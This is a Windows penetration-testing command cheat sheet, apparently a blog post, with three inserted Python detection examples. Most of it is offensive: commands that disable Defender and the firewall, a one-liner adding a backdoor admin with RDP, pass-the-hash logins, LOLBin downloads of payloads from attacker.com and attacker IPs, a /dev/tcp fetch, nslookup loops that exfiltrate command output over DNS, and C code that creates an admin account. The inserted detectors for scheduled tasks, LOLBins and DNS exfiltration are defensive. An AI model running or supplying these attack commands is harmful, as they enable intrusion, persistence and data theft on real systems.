In this article I list the most common basic CMD commands that Windows pentesters use. Because the article is purely technical, I will not explain each command in detail, only briefly what it does. If a command does not work, either you typed the syntax wrong or the command is not installed on the system and therefore cannot be used.
System-related CMD commands for Pentester
First of all, why do you need to know these basic commands when hacking into Windows? Because once you have a shell on Windows, the next things you need to do are turn off the firewall, create a backup user so you can log in again later, and so on.
So a pentester who masters the commands below saves time when exploiting Windows vulnerabilities.
Version and patch information
View system architecture: wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
Full system information: systeminfo
View OS name and version: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
View patch: wmic qfe get Caption,Description,HotFixID,InstalledOn
Hostname: hostname
View third-party drivers: DRIVERQUERY
Environment
List all environment variables: set
Some env variables to know:
- COMPUTERNAME: Computer name
- TEMP/TMP: Temp folder (save temporary files)
- USERNAME: Username
- HOMEPATH/USERPROFILE: Home Links
- windir: C:\Windows
- LOGONSERVER: Name of domain controller
- USERDNSDOMAIN: Domain using DNS
- USERDOMAIN: Domain Name
DNS request for PC: nslookup %LOGONSERVER%.%USERDNSDOMAIN%
Connected drives
wmic logicaldisk get caption
wmic logicaldisk get caption,description,providername
Anti Virus
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
sc query windefend
Remove Defender's signature definitions
(intended for machines without internet access): "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Recycle Bin
dir C:\$Recycle.Bin /s /b
Processes, Services & Software
Details of scheduled tasks:
schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
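The grep pipeline above answers one question: which scheduled tasks run as SYSTEM, and from where? The following is an added example (not from the original article) that parses the `schtasks /query /fo LIST /v` export in Python and additionally flags SYSTEM tasks whose binary sits outside the usual system directories, which is what an auditor looks for. The sample output and the trusted-path list are constructed assumptions.

```python
# Constructed sample of `schtasks /query /fo LIST /v` output (two task records, trimmed)
SAMPLE = """\
Folder: \\
HostName:                             WS01
TaskName:                             \\Updater
Author:                               WS01\\bob
Task To Run:                          C:\\Users\\Public\\update.exe
Run As User:                          SYSTEM
Schedule Type:                        At logon time

HostName:                             WS01
TaskName:                             \\Microsoft\\Windows\\Defrag\\ScheduledDefrag
Author:                               Microsoft Corporation
Task To Run:                          %windir%\\system32\\defrag.exe -c -h -o -$
Run As User:                          NT AUTHORITY\\SYSTEM
Schedule Type:                        Weekly
"""

# Accounts that mean "runs as LocalSystem"; paths a SYSTEM task is normally expected to live under (heuristic)
SYSTEM_ACCOUNTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCALSYSTEM"}
TRUSTED_PREFIXES = ("C:\\WINDOWS", "%WINDIR%", "%SYSTEMROOT%", "C:\\PROGRAM FILES")

def parse_schtasks(text):
    """One dict per task: records are blank-line separated 'Key:   Value' lines."""
    tasks, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                tasks.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")  # split on the first colon only; values may contain C:\
        if sep:
            current[key.strip()] = value.strip()
    if current:
        tasks.append(current)
    return tasks

def system_tasks(text):
    """(TaskName, Task To Run) for every task that runs as SYSTEM."""
    return [(t.get("TaskName", ""), t.get("Task To Run", ""))
            for t in parse_schtasks(text)
            if t.get("Run As User", "").upper() in SYSTEM_ACCOUNTS]

def suspicious_system_tasks(text):
    """SYSTEM tasks whose binary lives outside the trusted system directories (heuristic)."""
    return [(name, cmd) for name, cmd in system_tasks(text)
            if not cmd.strip('"').upper().startswith(TRUSTED_PREFIXES)]
```

Feed it the real export with `parse_schtasks(open("schtasks.txt", encoding="utf-16").read())` if the file was redirected from a Unicode console, otherwise with the default encoding.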
List of processes: tasklist /V
Processes that enable services: tasklist /SVC
Active Windows Services: net start
List of services: wmic service list brief
or sc query
Installed 64bit software: dir /a "C:\Program Files"
Installed 32bit software: dir /a "C:\Program Files (x86)"
Installed software: reg query HKEY_LOCAL_MACHINE\SOFTWARE
Domain Information
echo %USERDOMAIN% #Domain name
echo %USERDNSDOMAIN% #Domain name when the computer is logged in to a domain
echo %logonserver% #Domain controller name
set logonserver #Domain controller name
set log #Domain controller name
net groups /domain #List domain groups
net group "domain computers" /domain #List PCs joined to the domain
net view /domain #List PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
net group "Domain Controllers" /domain #List the computer accounts of the domain controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List the admin groups inside the domain (including the "Domain Admins" group)
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Information about a user
net accounts /domain #View the domain's current password and logon limits
nltest /domain_trust #Map domain trust relationships
Logs & Events
Make a security query using the credentials: wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
Users & Groups
Users
whoami /all #All information about you
whoami /priv #Show only privileges
net users #All users
dir /b /ad "C:\Users"
net user %username% #Information about your user
net accounts #Password policy information
qwinsta #Is anyone else logged in?
cmdkey /list #List stored credentials
net user /add [username] [password] #Create a user
#Open a new cmd.exe with new creds (to impersonate on the network)
runas /netonly /user:<USERNAME>\administrator cmd
#Check the current logon sessions as administrator using logonsessions from Sysinternals
logonsessions.exe
logonsessions64.exe
Groups
#Local
net localgroup #All existing groups
net localgroup Administrators #Information about a group (admins)
net localgroup administrators [username] /add #Add a user to administrators
#Domain
net group /domain #Information about domain groups
net group /domain <domain_group_name> #Users belonging to a group
List of sessions
qwinsta
klist sessions
Password Policy
net accounts
Add users to the group
# Add a domain user to the Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add a local user to the local Admins group
net user username password /ADD
net localgroup Administrators username /ADD
# Add a user to other groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
Network
Interfaces, Routes, Ports, Hosts and DNSCache
ipconfig /all #Information about interfaces
route print #View the current routes
arp -a #Information about hosts
netstat -ano #Open ports
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
Firewall
Information about the firewall and open ports:
netsh firewall show state
netsh advfirewall firewall show rule name=all
netsh firewall show config #Firewall information
Netsh Advfirewall show allprofiles
Turn off and on the firewall:
NetSh Advfirewall set allprofiles state off #Turn off the firewall
NetSh Advfirewall set allprofiles state on #Turn on the firewall
netsh firewall set opmode disable #Turn off the firewall
How to open ports:
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
Enable Remote Desktop:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #Not necessary
::sc config TermService start= auto #Not necessary
::net start Termservice #Not necessary
Turn on Remote assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
Ninja combo (new admin user, allow RDP + Remote Assistance + firewall)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
Share
net view #Get the list of computers
net view /all /domain [domainname] #Shares on the domain
net view \\computer /ALL #List the computer's shares
net use x: \\computer\share #Map a drive to the share
net share #Check current shares
WIFI
netsh wlan show profile #View the SSIDs of previously connected wifi networks
netsh wlan show profile <SSID> key=clear #View the wifi password
SNMP
Read this article to learn what SNMP is.
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Network Interfaces
ipconfig /all
ARP
arp -A
Download
Bitsadmin.exe
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
CertReq.exe
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Certutil.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
Desktopimgdownldr.exe
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Diantz.exe
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Esentutl.exe
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Expand.exe
expand \\webdav\folder\file.bat c:\ADS\file.bat
Extrac32.exe
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Findstr.exe
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Ftp.exe
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
GfxDownloadWrapper.exe
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Hh.exe
HH.exe http://some.url/script.ps1
ieexec.exe
ieexec.exe http://x.x.x.x:8080/bypass.exe
Makecab.exe
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
MpCmdRun.exe
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
Replace.exe
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Excel.exe
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Powerpnt.exe
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Squirrel.exe
squirrel.exe --download [url to package]
Update.exe
Update.exe --download [url to package]
Winword.exe
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Wsl.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
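Every download primitive in this section leaves a recognisable command line in process-creation telemetry. The following added example (not from the original article) turns the patterns above into detection rules and runs them over constructed process-creation records (timestamp|user|command line, the kind of fields Sysmon event 1 or Security event 4688 provide); the rules are heuristics and the log lines, users and IPs are made up.

```python
import re

# (name, regex over the process command line) for the download primitives listed above; heuristic, case-insensitive
RULES = [
    ("certutil-urlcache", re.compile(r"\bcertutil(\.exe)?\b.*\s-urlcache\b", re.I)),
    ("bitsadmin-addfile", re.compile(r"\bbitsadmin(\.exe)?\b.*\s/addfile\b", re.I)),
    ("mpcmdrun-download", re.compile(r"\bmpcmdrun(\.exe)?\b.*\s-downloadfile\b", re.I)),
    ("desktopimgdownldr", re.compile(r"\bdesktopimgdownldr(\.exe)?\b.*\s/lockscreenurl:", re.I)),
    ("esentutl-copy", re.compile(r"\besentutl(\.exe)?\b.*\s/y\s+\\\\", re.I)),
    ("unc-copy-lolbin", re.compile(r"\b(expand|extrac32|makecab|diantz|replace|findstr)(\.exe)?\b.*\s\\\\[^\\\s]+\\", re.I)),
    ("office-url-open", re.compile(r"\b(winword|excel|powerpnt|hh)(\.exe)?\b.*\s\"?https?://", re.I)),
    ("ftp-script", re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)),
    ("wsl-devtcp", re.compile(r"\bwsl(\.exe)?\b.*/dev/tcp/", re.I)),
]

# Constructed process-creation records: timestamp|user|command line
LOG = """\
2024-05-01T10:01:00Z|WS01\\bob|certutil.exe -urlcache -split -f http://203.0.113.9:8000/a.exe s.exe
2024-05-01T10:01:05Z|WS01\\bob|bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\\data\\autoruns.exe
2024-05-01T10:02:00Z|WS01\\alice|certutil.exe -hashfile C:\\setup.msi SHA256
2024-05-01T10:03:00Z|WS01\\bob|findstr /V /L dummy \\\\webdavserver\\folder\\file.exe > c:\\ADS\\file.exe
2024-05-01T10:04:00Z|NT AUTHORITY\\SYSTEM|"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -DownloadFile -url http://203.0.113.9/x.exe -path C:\\x.exe
2024-05-01T10:05:00Z|WS01\\alice|winword.exe "C:\\Users\\alice\\report.docx"
"""

def match_rules(cmdline):
    """Names of every rule the command line triggers (benign use of the same binary does not match)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan_process_log(log):
    """(timestamp, user, rule) for each flagged record."""
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, user, cmdline = line.split("|", 2)
        hits.extend((ts, user, name) for name in match_rules(cmdline))
    return hits
```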
Misc
cd #Current path
cd folder #Enter a folder
dir #List the folders and files in the current path
dir /a:h *path #List hidden files
dir /s /b #All paths within
time #Current time
date #Current date
shutdown /r /t 0 #Restart the computer immediately
type <file> #Read a file
Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
Hide files
attrib +h file #Hide the file
attrib -h file #Unhide the file
Grant full control over a file
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove permissions
Recursively copy files
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
ADS (What is ADS?)
dir /r #Detect ADS
more file.txt:ads.txt #Read an ADS
powershell (Get-Content file.txt -Stream ads.txt)
Listen on URL ACL addresses
You can listen on http://+:80/Temporary_Listen_Addresses/ without admin rights
netsh http show urlacl
DNS shell
Use one of the following two options:
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
Victim
The for /f tokens trick: lets me run a command, take the first X words of each line and send them via DNS to my server.
for /f %a in ('whoami') do nslookup %a <IP_kali>
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali>
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folders
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List those folders
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as the previous command
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as the previous command
You can also redirect the output and then read it.
whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
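Seen from the network, the loops above produce a burst of lookups for names that are really command output, sent to a resolver that is not the corporate DNS server. This added example (not from the original article) shows the defender's side: a small detector run over constructed DNS query records (timestamp, source, resolver, type, qname) that flags queries to non-corporate resolvers, names with non-hostname characters, and external names with too many labels, then reports sources producing a burst of them. The resolver list, internal zone and thresholds are assumptions.

```python
import re
from collections import Counter

ALLOWED_RESOLVERS = {"10.0.0.2"}        # assumed corporate DNS servers; anything else is direct-to-Internet DNS
INTERNAL_SUFFIXES = (".corp.example",)  # assumed internal zone, where long names are normal
MAX_LABELS = 4                          # external names with more labels than this are unusual
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9._-]+$")

# Constructed DNS query records: timestamp source resolver qtype qname
LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 10.0.0.2 A wpad.corp.example
2024-05-01T10:00:02Z 10.0.0.5 10.0.0.2 A fileserver.corp.example
2024-05-01T10:00:05Z 10.0.0.5 203.0.113.9 A ws01\\bob
2024-05-01T10:00:06Z 10.0.0.5 203.0.113.9 A SeShutdownPrivilege.Shut.down.the.system
2024-05-01T10:00:07Z 10.0.0.5 203.0.113.9 A Program.Files.(x86)
2024-05-01T10:00:08Z 10.0.0.6 10.0.0.2 A www.example.com
"""

def flag_query(resolver, qname):
    """Reasons a single query looks like command output pushed through nslookup; [] if it looks normal."""
    reasons = []
    if resolver not in ALLOWED_RESOLVERS:
        reasons.append("resolver %s is not a corporate DNS server" % resolver)
    if not HOSTNAME_RE.match(qname):
        reasons.append("qname contains non-hostname characters")
    if qname.count(".") + 1 > MAX_LABELS and not qname.lower().endswith(INTERNAL_SUFFIXES):
        reasons.append("unusually many labels for an external name")
    return reasons

def scan_dns_log(log):
    """(timestamp, source, qname, reasons) for every flagged query."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, resolver, _qtype, qname = line.split()
        reasons = flag_query(resolver, qname)
        if reasons:
            findings.append((ts, src, qname, reasons))
    return findings

def noisy_clients(log, threshold=3):
    """Sources with at least `threshold` flagged queries: a for /f loop emits one query per line of output."""
    counts = Counter(src for _, src, _, _ in scan_dns_log(log))
    return sorted(src for src, n in counts.items() if n >= threshold)
```

Blocking outbound UDP/TCP 53 from workstations to anything but the corporate resolvers removes the "resolver" signal entirely and is the cheaper control.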
Calling CMD from C code
#include <stdlib.h>
// When the file is run by an Admin, this program creates a user and then adds that user to the Admin group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
    int i;
    i=system("net users otherAcc 0TherAcc! /add");
    i=system("net localgroup administrators otherAcc /add");
    return 0;
}
These are the basic pentest CMD commands for Windows. Anyone who wants to learn more about pentesting is welcome to join AnonyViet's new Discord server.